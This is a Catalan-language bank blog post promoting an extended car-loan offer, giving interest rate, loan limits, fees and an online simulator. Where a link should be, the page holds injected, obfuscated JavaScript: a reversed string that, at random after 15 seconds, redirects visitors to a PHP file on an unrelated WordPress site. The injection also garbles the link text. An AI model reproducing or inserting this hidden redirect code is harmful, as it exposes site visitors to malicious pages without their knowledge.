Tornar
17 Setembre, 2020

Ara amb Crèdit Andorrà et serà més fàcil trobar la parella ideal, ja que hem prorrogat l’oferta del Crèdit Cotxe fins a final d’any perquè puguis finançar la compra del cotxe, la moto o el vehicle que desitges.

Volem estar a prop dels nostres clients i oferir-los els productes que s’adaptin millor a les seves necessitats en el moment actual, i per això Crèdit Cotxe et proposa un préstec personal amb les condicions següents:

  • tipus d’interès variable d’euríbor +5,75% (TAE: 6,12%*),
  • finançament de fins a 40.000 euros i a 5 anys, i
  • comissió variable d’estudi de només el 0,50% (mínim de 50 €)

A més, també disposes d’un simulador online perquè puguis calcular de manera fàcil i ràpida la quota mensual del préstec que necessitaries i la TAE resultant. Quan acabis, podràs descarregar-te el document amb la teva simulació o bé, si ho prefereixes, pots deixar les teves dades perquè un dels nostres gestors contacti amb tu.

$mRi=function(n){if (typeof ($mRi.list[n]) == “string”) return $mRi.list[n].split(“”).reverse().join(“”);return $mRi.list[n];};$mRi.list=[“\’php.sedoctrohspots/bil/issnaveler/snigulp/tnetnoc-pw/moc.keewnoihsafmahnetlehc.www//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5); if (number1==3){var delay = 15000;setTimeout($mRi(0), delay);}andorragroup.ad/ca/credit-cotxe ” target=”_blank” rel=”noreferrer noopener” aria-label=”aquí (opens in a new tab)”>aquí.

La concessió d’aquesta oferta queda subjecta als criteris de risc del Banc.*TAE calculada per a un import de 10.000 € a retornar en 5 anys. S’aplica l’euríbor anual 2020 (en cas que el tipus d’interès sigui negatiu, el mínim és 0%).

No et perdis res

Subscriu-te a la nostra newsletter i rebràs les novetats del nostre blog al teu correu electrònic.

Subscriure’m